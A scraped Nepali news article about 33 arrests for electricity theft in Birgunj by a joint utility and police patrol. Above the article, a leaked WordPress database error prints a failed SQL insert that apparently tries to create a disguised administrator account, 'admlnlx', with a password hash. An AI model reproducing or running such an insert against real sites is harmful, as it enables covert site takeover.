WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrLfXBJ6NlF.VwFkpfsxdLkiNrFpH5.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 06:00:59', '', 'admlnlx', 'admlnlx')
वीरगन्ज,पुस ४-
नेपाल विद्युत प्राधिकरण वितरण केन्द्रको गस्ती टोलीले विद्युत चोरी गर्ने ३३ जनालाई पक्राउ गरेको छ।वितरण केन्द्र तथा सुरक्षा निकाय सम्मिलित कर्मचारी टोलीले वीरगन्ज–२५ मनियारी वडाको जगरनाथपुरबाट १० जना र वीरगन्ज–३० उदयपुरघुर्मी वडाको घुर्मी र कोहडी गाउँबाट २३ जना जम्मा ३३ जनालाई पक्राउ गरेको हो।
बिहान साढे २ बजे देखि सुरु गरिएको गस्तीले उनीहरुलाई पक्राउ गरेको वीरगन्ज वितरण केन्द्रका प्रमुख चुटुनकुमार श्रीवास्तवले जानकारी दिए।
जिल्ला प्रहरी कर्याललय पर्सा, सीमा सुरक्षा कार्यालय र विद्युत कर्मचारीहरुको संयुक्त टोलीले पक्राउ गरेका ३३ जनाबाट करिब साढे ३ लाख राजश्व संकलन हुने उनले बताए। पछिल्लो समयमा प्राधिकरणको वितरण केन्द्र वीरगन्जले विद्युत चुहावट नियन्त्रण गर्न गस्ती टोली परिचालन गरेको छ।